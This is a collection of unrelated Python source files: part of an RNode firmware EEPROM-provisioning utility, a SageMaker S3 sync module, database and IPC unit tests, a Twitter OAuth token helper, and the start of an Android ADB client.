"+str(int(rnode.hw_rev))) RNS.log("\tSerial number : "+RNS.hexrep(rnode.serialno)) RNS.log("\tFrequency range : "+str(rnode.min_freq/1e6)+" MHz - "+str(rnode.max_freq/1e6)+" MHz") RNS.log("\tMax TX power : "+str(rnode.max_output)+" dBm") RNS.log("\tManufactured : "+timestring) if rnode.configured: rnode.bandwidth = rnode.conf_bandwidth rnode.r_bandwidth = rnode.conf_bandwidth rnode.sf = rnode.conf_sf rnode.r_sf = rnode.conf_sf rnode.cr = rnode.conf_cr rnode.r_cr = rnode.conf_cr rnode.updateBitrate() txp_mw = round(pow(10, (rnode.conf_txpower/10)), 3) RNS.log(""); RNS.log("\tDevice mode : TNC") RNS.log("\t Frequency : "+str((rnode.conf_frequency/1000000.0))+" MHz") RNS.log("\t Bandwidth : "+str(rnode.conf_bandwidth/1000.0)+" KHz") RNS.log("\t TX power : "+str(rnode.conf_txpower)+" dBm ("+str(txp_mw)+" mW)") RNS.log("\t Spreading factor : "+str(rnode.conf_sf)) RNS.log("\t Coding rate : "+str(rnode.conf_cr)) RNS.log("\t On-air bitrate : "+str(rnode.bitrate_kbps)+" kbps") else: RNS.log("\tDevice mode : Normal (host-controlled)") print("") exit() else: RNS.log("EEPROM is invalid, no further information available") exit() if args.rom: if rnode.provisioned and not args.autoinstall: RNS.log("EEPROM bootstrap was requested, but a valid EEPROM was already present.") RNS.log("No changes are being made.") exit() else: if rnode.signature_valid: RNS.log("EEPROM bootstrap was requested, but a valid EEPROM was already present.") RNS.log("No changes are being made.") exit() else: if args.autoinstall: RNS.log("Clearing old EEPROM, this will take about 15 seconds...") rnode.wipe_eeprom() if rnode.platform == ROM.PLATFORM_ESP32: RNS.log("Waiting for ESP32 reset...") 
time.sleep(6) else: time.sleep(3) os.makedirs("./firmware", exist_ok=True) counter = None counter_path = "./firmware/serial.counter" try: if os.path.isfile(counter_path): file = open(counter_path, "r") counter_str = file.read() counter = int(counter_str) file.close() else: counter = 0 except Exception as e: RNS.log("Could not create device serial number, exiting") RNS.log(str(e)) exit() serialno = counter+1 model = None hwrev = None if args.product != None: if args.product == "03": mapped_product = ROM.PRODUCT_RNODE if args.product == "f0": mapped_product = ROM.PRODUCT_HMBRW if args.product == "e0": mapped_product = ROM.PRODUCT_TBEAM if mapped_model != None: model = mapped_model else: if args.model == "a4": model = ROM.MODEL_A4 elif args.model == "a9": model = ROM.MODEL_A9 # TODO: Remove, no more homebrew model differentiation # elif args.model == "f4": # model = ROM.MODEL_F4 # elif args.model == "f9": # model = ROM.MODEL_F9 elif args.model == "e4": model = ROM.MODEL_E4 elif args.model == "e9": model = ROM.MODEL_E9 elif args.model == "ff": model = ROM.MODEL_FF if args.hwrev != None and (args.hwrev > 0 and args.hwrev < 256): hwrev = chr(args.hwrev) if serialno > 0 and model != None and hwrev != None: try: from cryptography.hazmat.primitives import hashes from cryptography.hazmat.backends import default_backend timestamp = int(time.time()) time_bytes = struct.pack(">I", timestamp) serial_bytes = struct.pack(">I", serialno) file = open(counter_path, "w") file.write(str(serialno)) file.close() info_chunk = b"" + bytes([mapped_product, model, ord(hwrev)]) info_chunk += serial_bytes info_chunk += time_bytes digest = hashes.Hash(hashes.MD5(), backend=default_backend()) digest.update(info_chunk) checksum = digest.finalize() RNS.log("Loading signing key...") signature = None key_path = "./firmware/signing.key" if os.path.isfile(key_path): try: file = open(key_path, "rb") private_bytes = file.read() file.close() private_key = serialization.load_der_private_key( private_bytes, password=None, backend=default_backend() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) signature = private_key.sign( checksum, padding.PSS( mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH ), hashes.SHA256() ) except Exception as e: RNS.log("Error while signing EEPROM") RNS.log(str(e)) else: RNS.log("No signing key found") exit() RNS.log("Bootstrapping device EEPROM...") rnode.hard_reset() rnode.write_eeprom(ROM.ADDR_PRODUCT, mapped_product) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MODEL, model) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_HW_REV, ord(hwrev)) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL, serial_bytes[0]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL+1, serial_bytes[1]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL+2, serial_bytes[2]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL+3, serial_bytes[3]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE, time_bytes[0]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE+1, time_bytes[1]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE+2, time_bytes[2]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE+3, time_bytes[3]) time.sleep(0.006) for i in range(0,16): rnode.write_eeprom(ROM.ADDR_CHKSUM+i, checksum[i]) time.sleep(0.006) for i in range(0,128): rnode.write_eeprom(ROM.ADDR_SIGNATURE+i, signature[i]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_INFO_LOCK, ROM.INFO_LOCK_BYTE) 
RNS.log("EEPROM written! Validating...") if rnode.platform == ROM.PLATFORM_ESP32: RNS.log("Waiting for ESP32 reset...") time.sleep(5) rnode.download_eeprom() if rnode.provisioned: RNS.log("EEPROM Bootstrapping successful!") rnode.hard_reset() if args.autoinstall: print("") print("RNode Firmware autoinstallation complete!") print("") print("To use your device with Reticulum, read the documetation at:") print("") print("https://markqvist.github.io/Reticulum/manual/gettingstartedfast.html") print("") print("Thank you for using this utility! Please help the project by") print("contributing code and reporting bugs, or by donating!") print("") print("Your contributions and donations directly further the realisation") print("of truly open, free and resilient communications systems.") print("") print_donation_block() print("") try: os.makedirs("./firmware/device_db/", exist_ok=True) file = open("./firmware/device_db/"+serial_bytes.hex(), "wb") written = file.write(rnode.eeprom) file.close() except Exception as e: RNS.log("WARNING: Could not backup device EEPROM to disk") exit() else: RNS.log("EEPROM was written, but validation failed. Check your settings.") exit() except Exception as e: RNS.log("An error occurred while writing EEPROM. The contained exception was:") RNS.log(str(e)) raise e else: RNS.log("Invalid data specified, cancelling EEPROM write") exit() if rnode.provisioned: if args.normal: rnode.setNormalMode() RNS.log("Device set to normal (host-controlled) operating mode") exit() if args.tnc: if not (args.freq and args.bw and args.txp and args.sf and args.cr): RNS.log("Please input startup configuration:") print("") if args.freq: rnode.frequency = args.freq else: print("Frequency in Hz:\t", end="") rnode.frequency = int(input()) if args.bw: rnode.bandwidth = args.bw else: print("Bandwidth in Hz:\t", end="") rnode.bandwidth = int(input()) if args.txp != None and (args.txp >= 0 and args.txp <= 17): rnode.txpower = args.txp else: print("TX Power in dBm:\t", end="") rnode.txpower = int(input()) if args.sf: rnode.sf = args.sf else: print("Spreading factor:\t", end="") rnode.sf = int(input()) if args.cr: rnode.cr = args.cr else: print("Coding rate:\t\t", end="") rnode.cr = int(input()) print("") rnode.initRadio() sleep(0.5) rnode.setTNCMode() RNS.log("Device set to TNC operating mode") sleep(1.0) exit() else: RNS.log("This device contains a valid firmware, but EEPROM is invalid.") RNS.log("Probably the device has not been initialised, or the EEPROM has been erased.") RNS.log("Please correctly initialise the device and try again!") else: print("") parser.print_help() print("") exit() except KeyboardInterrupt: print("") exit() if __name__ == "__main__": main()
_intermediate_output.py
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
#     http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import

import concurrent.futures as futures
import multiprocessing
import os
import shutil
import time

import boto3
import boto3.s3.transfer as s3transfer
import inotify_simple
from six.moves.urllib.parse import urlparse

from sagemaker_containers import _env, _logging

logger = _logging.get_logger()

intermediate_path = _env.output_intermediate_dir  # type: str
failure_file_path = os.path.join(_env.output_dir, 'failure')  # type: str
success_file_path = os.path.join(_env.output_dir, 'success')  # type: str
tmp_dir_path = os.path.join(intermediate_path, '.tmp.sagemaker_s3_sync')  # type: str


def _timestamp():
    """Return a timestamp with microsecond precision."""
    moment = time.time()
    moment_us = repr(moment).split('.')[1]
    return time.strftime("%Y-%m-%d-%H-%M-%S-{}".format(moment_us), time.gmtime(moment))


def _upload_to_s3(s3_uploader, relative_path, file_path, filename):
    try:
        key = os.path.join(s3_uploader['key_prefix'], relative_path, filename)
        s3_uploader['transfer'].upload_file(file_path, s3_uploader['bucket'], key)
    except FileNotFoundError:
        # Broken link or deleted
        pass
    except Exception:
        logger.exception('Failed to upload file to s3.')
    finally:
        # delete the original file
        if os.path.exists(file_path):
            os.remove(file_path)


def _copy_file(executor, s3_uploader, relative_path, filename):
    try:
        src = os.path.join(intermediate_path, relative_path, filename)
        dst = os.path.join(tmp_dir_path, relative_path, '{}.{}'.format(_timestamp(), filename))
        shutil.copy2(src, dst)
        executor.submit(_upload_to_s3, s3_uploader, relative_path, dst, filename)
    except FileNotFoundError:
        # Broken link or deleted
        pass
    except Exception:
        logger.exception('Failed to copy file to the temporary directory.')


def _watch(inotify, watchers, watch_flags, s3_uploader):
    """As soon as a user is done with a file under `/opt/ml/output/intermediate`,
    we get notified via inotify. We copy the file under the
    `/opt/ml/output/intermediate/.tmp.sagemaker_s3_sync` folder, preserving the
    same folder structure, to prevent it from being modified further. As we copy
    the file we add a timestamp with microsecond precision to avoid modification
    during the s3 upload. After that we upload the file to s3 in a separate
    thread. The queue of files to move is kept FIFO.
    """
    # initialize a thread pool with 1 worker
    # to be used for uploading files to s3 in a separate thread
    executor = futures.ThreadPoolExecutor(max_workers=1)

    last_pass_done = False
    stop_file_exists = False

    # after we see the stop file, do one additional pass to make sure we didn't miss anything
    while not last_pass_done:
        # wait for any events in the directory for 1 sec and then re-check exit conditions
        for event in inotify.read(timeout=1000):
            for flag in inotify_simple.flags.from_mask(event.mask):
                # If a new directory was created, traverse the directory tree to recursively
                # add all created folders to the watchers list, and upload any files already
                # in them to s3. There is a potential race condition if we upload a file and
                # then see a notification for it, but this should not cause any problems,
                # because when we copy files to the temp dir we add a unique timestamp with
                # microsecond precision.
                if flag is inotify_simple.flags.ISDIR and inotify_simple.flags.CREATE & event.mask:
                    for folder, dirs, files in os.walk(os.path.join(intermediate_path, event.name)):
                        wd = inotify.add_watch(folder, watch_flags)
                        relative_path = os.path.relpath(folder, intermediate_path)
                        watchers[wd] = relative_path
                        tmp_sub_folder = os.path.join(tmp_dir_path, relative_path)
                        if not os.path.exists(tmp_sub_folder):
                            os.makedirs(tmp_sub_folder)
                        for file in files:
                            _copy_file(executor, s3_uploader, relative_path, file)
                elif flag is inotify_simple.flags.CLOSE_WRITE:
                    _copy_file(executor, s3_uploader, watchers[event.wd], event.name)

        last_pass_done = stop_file_exists
        stop_file_exists = os.path.exists(success_file_path) or os.path.exists(failure_file_path)

    # wait for all the s3 upload tasks to finish and shutdown the executor
    executor.shutdown(wait=True)


def start_sync(s3_output_location, region):
    """Starts the intermediate folder sync, which copies files from the
    '/opt/ml/output/intermediate' directory to the provided s3 output location
    as files are created or modified. If files are deleted locally, it doesn't
    delete them from s3.

    The sync runs as a daemonic process, and only if the intermediate directory
    doesn't exist yet; if it does, it indicates that the platform is taking care
    of syncing files to S3 and the container should not interfere.

    Args:
        s3_output_location (str): s3 URL (or 'file://' URL) the intermediate
            output is synced to.
        region (str): the AWS region used to create the s3 client.

    Returns:
        (multiprocessing.Process): the intermediate output sync daemonic process.
    """
    if not s3_output_location or os.path.exists(intermediate_path):
        logger.debug('Could not initialize intermediate folder sync to s3.')
        return

    # create intermediate and intermediate_tmp directories
    os.makedirs(intermediate_path)
    os.makedirs(tmp_dir_path)

    # configure unique s3 output location similar to how the SageMaker platform does it
    # or link it to the local output directory
    url = urlparse(s3_output_location)
    if url.scheme == 'file':
        logger.debug('Local directory is used for output. No need to sync any intermediate output.')
        return
    elif url.scheme != 's3':
        raise ValueError("Expecting 's3' scheme, got: %s in %s" % (url.scheme, url))

    # create s3 transfer client
    client = boto3.client('s3', region)
    s3_transfer = s3transfer.S3Transfer(client)
    s3_uploader = {
        'transfer': s3_transfer,
        'bucket': url.netloc,
        'key_prefix': os.path.join(url.path.lstrip('/'),
                                   os.environ.get('TRAINING_JOB_NAME', ''),
                                   'output', 'intermediate'),
    }

    # Add intermediate folder to the watch list
    inotify = inotify_simple.INotify()
    watch_flags = inotify_simple.flags.CLOSE_WRITE | inotify_simple.flags.CREATE
    watchers = {}
    wd = inotify.add_watch(intermediate_path, watch_flags)
    watchers[wd] = ''

    # start subprocess to sync any files from the intermediate folder to s3
    p = multiprocessing.Process(target=_watch, args=[inotify, watchers, watch_flags, s3_uploader])
    # Make the process daemonic as a safety switch to prevent the training job from hanging
    # forever in case something goes wrong and the main container process exits unexpectedly
    p.daemon = True
    p.start()
    return p
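# A minimal usage sketch (bucket name and region below are assumed values; this
# needs the SageMaker container environment for _env, and Linux for inotify):
# start the sync daemon, write a file under the intermediate directory, then
# create the success marker so the watcher performs its final pass and exits.
if __name__ == '__main__':
    sync_process = start_sync('s3://my-bucket/output', 'us-west-2')
    with open(os.path.join(intermediate_path, 'metrics.json'), 'w') as f:
        f.write('{"loss": 0.1}')  # CLOSE_WRITE on this file triggers copy + upload
    open(success_file_path, 'w').close()  # stop condition checked by _watch's loop
    if sync_process is not None:
        sync_process.join(timeout=30)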
test_errcodes.py
#!/usr/bin/env python # test_errcodes.py - unit test for psycopg2.errcodes module # # Copyright (C) 2015 Daniele Varrazzo <daniele.varrazzo@gmail.com> # # psycopg2 is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # In addition, as a special exception, the copyright holders give # permission to link this program with the OpenSSL library (or with # modified versions of OpenSSL that use the same license as OpenSSL), # and distribute linked combinations including the two. # # You must obey the GNU Lesser General Public License in all respects for # all of the code used other than OpenSSL. # # psycopg2 is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or # FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public # License for more details. from testutils import unittest, ConnectingTestCase try: reload except NameError: from imp import reload from threading import Thread from psycopg2 import errorcodes class ErrocodeTests(ConnectingTestCase): def test_lookup_threadsafe(self): # Increase if it does not fail with KeyError MAX_CYCLES = 2000 errs = [] def f(pg_code='40001'): try: errorcodes.lookup(pg_code) except Exception, e: errs.append(e) for __ in xrange(MAX_CYCLES): reload(errorcodes) (t1, t2) = (Thread(target=f), Thread(target=f)) (t1.start(), t2.start()) (t1.join(), t2.join()) if errs: self.fail( "raised %s errors in %s cycles (first is %s %s)" % ( len(errs), MAX_CYCLES, errs[0].__class__.__name__, errs[0])) def test_suite(): return unittest.TestLoader().loadTestsFromName(__name__) if __name__ == "__main__": unittest.main()
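# A standalone sketch of the reload/lookup race the test above exercises, kept
# outside the TestCase as an illustration only (the function name and defaults
# are ours, not part of psycopg2). It returns the exceptions raised while two
# threads call lookup() against a freshly reloaded errorcodes module.
def _demo_lookup_race(cycles=100, pg_code='40001'):
    errs = []

    def probe():
        try:
            errorcodes.lookup(pg_code)
        except Exception as e:
            errs.append(e)

    for _ in range(cycles):
        reload(errorcodes)  # wipes and repopulates the module namespace
        t1, t2 = Thread(target=probe), Thread(target=probe)
        t1.start(); t2.start()
        t1.join(); t2.join()

    return errs  # non-empty if a lookup raced against the reload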
test_ipc.py
import abc import itertools import multiprocessing import sys import textwrap import threading import time import traceback from typing import Any, Callable, List, Optional, cast import pytest import determined as det from determined import ipc class Subproc(multiprocessing.Process): """ Subproc executes an abstract main(), returning the stacktrace as a string in join(). """ def __init__(self, *arg: Any, **kwarg: Any): self._error_queue = multiprocessing.Queue() # type: Any super().__init__(*arg, **kwarg) def run(self) -> None: try: self.main() except Exception: self._error_queue.put(traceback.format_exc()) def join_and_check(self, *args: Any, **kwargs: Any) -> Optional[str]: super().join(*args, **kwargs) if not self._error_queue.empty(): return cast(str, self._error_queue.get()) return None @abc.abstractmethod def main(self) -> None: pass class SubprocGroup(list): """ SubprocGroup provides a context manager to coordinate opening and closing of many Subprocs. """ def join_all(self) -> None: # Every process should be joinable within one second. errors = [subproc.join_and_check() for subproc in self] # Terminate any processes which did not exit in time. num_unterminated = 0 for subproc in self: if subproc.is_alive(): subproc.terminate() subproc.join() num_unterminated += 1 assert num_unterminated == 0 # Make sure none of the processes raised an error. errors = [e for e in errors if e is not None] if len(errors): print("Traceback from child process:", file=sys.stderr) print(textwrap.indent(errors[0], "|"), file=sys.stderr) raise AssertionError("failure in child process") def __enter__(self) -> "SubprocGroup": for subproc in self: subproc.start() return self def __exit__(self, *_: Any) -> None: self.join_all() class BroadcastClientSubproc(Subproc): def __init__( self, rank: int, size: int, pub_url: str, pull_url: str, exp_msgs: List[int] ) -> None: self._rank = rank self._size = size self._pub_url = pub_url self._pull_url = pull_url self._exp_msgs = exp_msgs super().__init__() def main(self) -> None: with ipc.ZMQBroadcastClient(self._pub_url, self._pull_url) as broadcast_client: # Start the server-client communication test. 
broadcast_client.send(ipc.ConnectedMessage(process_id=0)) for exp in self._exp_msgs: msg = broadcast_client.recv() assert msg == exp broadcast_client.send(2 * msg) def test_broadcast_server_client() -> None: num_subprocs = 3 with ipc.ZMQBroadcastServer(num_connections=num_subprocs) as broadcast_server: pub_url = f"tcp://localhost:{broadcast_server.get_pub_port()}" pull_url = f"tcp://localhost:{broadcast_server.get_pull_port()}" msgs = list(range(10)) with SubprocGroup( BroadcastClientSubproc(i, num_subprocs, pub_url, pull_url, msgs) for i in range(num_subprocs) ) as subprocs: def health_check() -> None: assert all(subproc.is_alive() for subproc in subprocs) for subproc in subprocs: assert subproc.is_alive() gathered, _ = broadcast_server.gather_with_polling(health_check) assert all(isinstance(g, ipc.ConnectedMessage) for g in gathered) for msg in msgs: broadcast_server.broadcast(msg) gathered, _ = broadcast_server.gather_with_polling(health_check) assert all(g == 2 * msg for g in gathered) def test_zmq_server_client() -> None: server = ipc.ZMQServer(num_connections=1, ports=None, port_range=(1000, 65535)) assert len(server.get_ports()) == 1 port = server.get_ports()[0] assert 1000 <= port <= 65535 client = ipc.ZMQClient(ip_address="localhost", port=port) client_object = {"DeterminedAI": "Great", "det": "Fantastic", 12345: -100} client.send(client_object) server_object = server.receive_blocking(send_rank=0) assert server_object == client_object server_object["DeterminedAI"] = "VeryGreat" server.send(server_object) client_object = client.receive() assert server_object == client_object @pytest.mark.parametrize("cross_size", [1, 4]) @pytest.mark.parametrize("local_size", [1, 4]) @pytest.mark.parametrize("force_tcp", [False, True]) def test_distributed_context(cross_size: int, local_size: int, force_tcp: bool) -> None: size = cross_size * local_size def do_parallel(fn: Callable) -> List: """ Run the same function on one-thread-per-rank, assert there were no exceptions, and return the results from each rank. """ results = [None] * size # type: List errors = [None] * size # type: List threads = [] for cross_rank, local_rank in itertools.product(range(cross_size), range(local_size)): rank = cross_rank * local_size + local_rank def _fn(rank: int, cross_rank: int, local_rank: int) -> None: try: results[rank] = fn(rank, cross_rank, local_rank) except Exception: errors[rank] = traceback.format_exc() raise threads.append(threading.Thread(target=_fn, args=(rank, cross_rank, local_rank))) for thread in threads: thread.start() for thread in threads: thread.join() assert errors == [None] * size, "not all threads exited without error" return results # Create all of the DistributedContexts. def make_distributed_context(rank: int, cross_rank: int, local_rank: int) -> Any: rank_info = det.RankInfo( rank=cross_rank * local_size + local_rank, size=cross_size * local_size, local_rank=local_rank, local_size=local_size, cross_rank=cross_rank, cross_size=cross_size, ) return det.DistributedContext( rank_info=rank_info, chief_ip="localhost", force_tcp=force_tcp, ) contexts = do_parallel(make_distributed_context) # Perform a broadcast. results = do_parallel(lambda rank, _, __: contexts[rank]._zmq_broadcast(rank)) assert results == [0] * size, "not all threads ran broadcast correctly" # Perform a local broadcast. 
results = do_parallel(lambda rank, _, __: contexts[rank]._zmq_broadcast_local(rank)) expect = [rank - (rank % local_size) for rank in range(size)] # type: Any assert results == expect, "not all threads ran broadcast_local correctly" # Perform a gather. results = do_parallel(lambda rank, _, __: set(contexts[rank]._zmq_gather(rank) or [])) chief = set(range(size)) expect = [set(range(size)) if rank == 0 else set() for rank in range(size)] assert results == [chief] + [set()] * (size - 1), "not all threads ran gather correctly" # Perform a local gather. results = do_parallel(lambda rank, _, __: set(contexts[rank]._zmq_gather_local(rank) or [])) expect = [ set(range(rank, rank + local_size)) if rank % local_size == 0 else set() for rank in range(size) ] assert results == expect, "not all threads ran gather correctly" # Perform an allgather. results = do_parallel(lambda rank, _, __: set(contexts[rank]._zmq_allgather(rank))) expect = set(range(size)) assert results == [expect] * size, "not all threads ran allgather correctly" # Perform a local allgather. results = do_parallel(lambda rank, _, __: set(contexts[rank]._zmq_allgather_local(rank))) expect = [ set(range(cross_rank * local_size, (cross_rank + 1) * local_size)) for cross_rank, _ in itertools.product(range(cross_size), range(local_size)) ] assert results == expect, "not all threads ran allgather_local correctly" # Close all contexts. for context in contexts: context.close() class TestPIDServer: def test_normal_execution(self) -> None: with ipc.PIDServer(addr=0, num_clients=2) as pid_server: assert pid_server.listener _, port = pid_server.listener.getsockname() def worker_proc() -> None: with ipc.PIDClient(port) as pid_client: for _ in range(5): pid_client.keep_alive() time.sleep(0.1) procs = [ multiprocessing.Process(target=worker_proc), multiprocessing.Process(target=worker_proc), ] for p in procs: p.start() pid_server.run() for p in procs: p.join() assert len(pid_server.graceful_shutdowns) == 2 def test_worker_crashes(self) -> None: with ipc.PIDServer(addr=0, num_clients=2) as pid_server: assert pid_server.listener _, port = pid_server.listener.getsockname() # Enforce that the crashed worker causes the exit before the other worker exits. deadline = time.time() + 20 def worker_proc() -> None: with ipc.PIDClient(port): # Wait for the crashing process to cause us to die. time.sleep(30) def crashing_worker_proc() -> None: with ipc.PIDClient(port): time.sleep(0.5) raise ValueError("Crashing...") procs = [ multiprocessing.Process(target=worker_proc), multiprocessing.Process(target=crashing_worker_proc), ] for p in procs: p.start() with pytest.raises(det.errors.WorkerError): pid_server.run() assert time.time() < deadline, "crashing worker did not trigger exit" for p in procs: p.terminate() p.join() assert len(pid_server.graceful_shutdowns) == 0 def test_health_check_pre_connect(self) -> None: with ipc.PIDServer(addr=0, num_clients=2) as pid_server: assert pid_server.listener _, port = pid_server.listener.getsockname() fail_time = time.time() + 0.2 def worker_proc() -> None: with ipc.PIDClient(port): time.sleep(10) def health_check() -> None: assert time.time() < fail_time # Only one worker to guarantee a failed healthcheck before all workers have connected. 
procs = [ multiprocessing.Process(target=worker_proc), ] for p in procs: p.start() with pytest.raises(AssertionError): pid_server.run(health_check, poll_period=0.05) for p in procs: p.join() assert len(pid_server.graceful_shutdowns) == 0 def test_health_check_post_connect(self) -> None: with ipc.PIDServer(addr=0, num_clients=2) as pid_server: assert pid_server.listener _, port = pid_server.listener.getsockname() fail_time = time.time() + 0.2 def worker_proc() -> None: with ipc.PIDClient(port): time.sleep(10) def health_check() -> None: assert time.time() < fail_time procs = [ multiprocessing.Process(target=worker_proc), multiprocessing.Process(target=worker_proc), ] for p in procs: p.start() with pytest.raises(AssertionError): pid_server.run(health_check, poll_period=0.05) for p in procs: p.join() assert len(pid_server.graceful_shutdowns) == 0
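# A minimal illustration of the Subproc error-propagation pattern used
# throughout this file: the child's traceback travels through the internal
# queue and comes back as a string from join_and_check(). The class and test
# below are illustrative additions, not part of the determined test suite.
class _DoomedSubproc(Subproc):
    def main(self) -> None:
        raise RuntimeError("expected failure")


def test_subproc_propagates_child_traceback() -> None:
    proc = _DoomedSubproc()
    proc.start()
    err = proc.join_and_check()
    assert err is not None and "expected failure" in err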
main.py
from multiprocessing import Process
from requests_oauthlib import OAuth1Session
from urllib.parse import parse_qsl
import webbrowser, argparse, web_server, pprint

CK = ""
CS = ""

def gen_auth_url(consumer_key, consumer_secret, oauth_callback):
    global CK, CS  # keep the keys for http_callback, which runs after the redirect
    print("Generating the URL for authentication...")
    CK = consumer_key
    CS = consumer_secret
    twitter = OAuth1Session(consumer_key, consumer_secret)
    response = twitter.post(
        "https://api.twitter.com/oauth/request_token",
        params={'oauth_callback': oauth_callback}
    )
    request_token = dict(parse_qsl(response.content.decode("utf-8")))
    authenticate_url = "https://api.twitter.com/oauth/authenticate"
    authenticate_endpoint = '%s?oauth_token=%s' \
        % (authenticate_url, request_token['oauth_token'])
    print("Authentication url: " + authenticate_endpoint)
    webbrowser.open(authenticate_endpoint)
    print("Waiting for authentication...")
    proc = Process(target=web_server.run_server)
    proc.start()

def http_callback(tokens):
    # tokens[0] is the oauth_token, tokens[1] the oauth_verifier from the redirect
    print("Generating access token...")
    twitter = OAuth1Session(
        CK,
        CS,
        tokens[0],
        tokens[1],
    )
    response = twitter.post(
        "https://api.twitter.com/oauth/access_token",
        params={'oauth_verifier': tokens[1]}
    )
    access_token = dict(parse_qsl(response.content.decode("utf-8")))
    print("Access token successfully generated!")
    print("===ACCESS TOKEN===")
    pprint.pprint(access_token)
    print("==================")

def main() -> None:
    print("get_twitter_oauth_key\nBy YU-PEI")
    parser = argparse.ArgumentParser(description='Easy to generate Twitter API OAuth keys.')
    parser.add_argument('CK', help='TwitterAPI Consumer key')
    parser.add_argument('CS', help='TwitterAPI Consumer secret')
    parser.add_argument('callback', help='TwitterAPI OAuth_callback')
    args = parser.parse_args()
    gen_auth_url(args.CK, args.CS, args.callback)

if __name__ == "__main__":
    main()
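# Example invocation (placeholder values, not real credentials):
#
#   python main.py XXXXXXXXXXXXXXXXXXXX YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY \
#       http://127.0.0.1:8080/callback
#
# The callback URL must match the one registered for the app on the Twitter
# developer portal; web_server.run_server is presumably the local HTTP server
# that receives the redirect and hands [oauth_token, oauth_verifier] to
# http_callback.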
adbclient.py
# -*- coding: UTF-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
'''ADB client, used to communicate with the ADB daemon
'''

from __future__ import unicode_literals
import six
import os
import time
import socket, select
import struct
import threading
from io import BytesIO
from qt4a.androiddriver.util import logger, utf8_encode, TimeoutError

SYNC_DATA_MAX = 64 * 1024


class AdbError(RuntimeError):
    pass


class Pipe(object):
    '''In-memory pipe emulation
    '''

    def __init__(self):
        self._buffer = BytesIO()
        self._max_buffer_size = 4096 * 16
        self._lock = threading.Lock()
        self._pos = 0  # current read-pointer position
        self._write_buffer = b''  # guarantees that only whole lines are written

    def write(self, s):
        self._write_buffer += s
        pos = self._write_buffer.rfind(b'\n')
        if pos <= 0:
            return
        s = self._write_buffer[:pos]
        self._write_buffer = self._write_buffer[pos:]
        with self._lock:
            self._buffer.seek(0, 2)  # move the pointer to the end
            self._buffer.write(s)

    def readline(self):
        wait = False
        while True:
            if wait:
                time.sleep(0.1)
            with self._lock:
                self._buffer.seek(0, 2)
                buffer_size = self._buffer.tell()
            if buffer_size <= self._pos:
                wait = True
                continue
            with self._lock:
                self._buffer.seek(self._pos)
                ret = self._buffer.readline()
                if len(ret) == 0:
                    wait = True
                    continue
                else:
                    self._pos = self._buffer.tell()
                    self._buffer.seek(0, 2)
                    buffer_size = self._buffer.tell()
                    if buffer_size >= self._max_buffer_size:
                        # create a new buffer holding only the unread tail
                        self._buffer.seek(self._pos)
                        buffer = self._buffer.read()
                        self._buffer.close()
                        self._buffer = BytesIO()
                        self._buffer.write(buffer)
                        self._pos = 0
                    return ret

    def read(self):
        '''read all data currently in the pipe
        '''
        with self._lock:
            self._buffer.seek(self._pos)
            result = self._buffer.read()
            if self._write_buffer:
                result += self._write_buffer
                self._write_buffer = b''  # was '': keep the buffer type consistent (bytes)
            return result


class ADBPopen(object):
    '''subprocess.Popen-compatible wrapper
    '''

    class StdinPipe(object):
        '''write side of the child's stdin
        '''

        def __init__(self, sock):
            self._sock = sock

        def write(self, s):
            self._sock.send(s)

        def flush(self):
            pass

    def __init__(self, sock, timeout=None):
        self._sock = sock
        self._stdin = self.StdinPipe(sock)
        self._stdout = Pipe()
        self._stderr = Pipe()
        self._running = True
        self._timeout = timeout
        if self._timeout is None:
            self._timeout = 0xFFFFFFFF
        self._event = threading.Event()  # signals that all data has been received
        self._thread = threading.Thread(target=self._work_thread, args=(), name=self.__class__.__name__)
        self._thread.daemon = True
        self._thread.start()

    @property
    def stdin(self):
        return self._stdin

    @property
    def stdout(self):
        return self._stdout

    @property
    def stderr(self):
        return self._stderr

    @property
    def pid(self):
        return self._thread.ident

    def _work_thread(self):
        time0 = time.time()
        while self._running and time.time() - time0 < self._timeout:
            infds, outfds, errfds = select.select([self._sock, ], [], [], 1)
            if len(infds) > 0:
                try:
                    buff = self._sock.recv(4096)
                    if len(buff) == 0:
                        self._sock.close()
                        self._sock = None
                        self._running = False
                        self._event.set()
                        return
                    self._stdout.write(buff)
                except socket.error as e:
                    logger.info("Error receiving response data: %s" % (e))
                    # import traceback
                    # traceback.print_exc()
                    self._stdout.write(b' ')  # notify the reader to exit
                    self._sock.close()
                    self._sock = None
                    self._running = False
                    self._event.set()
                    return
        self._sock.close()
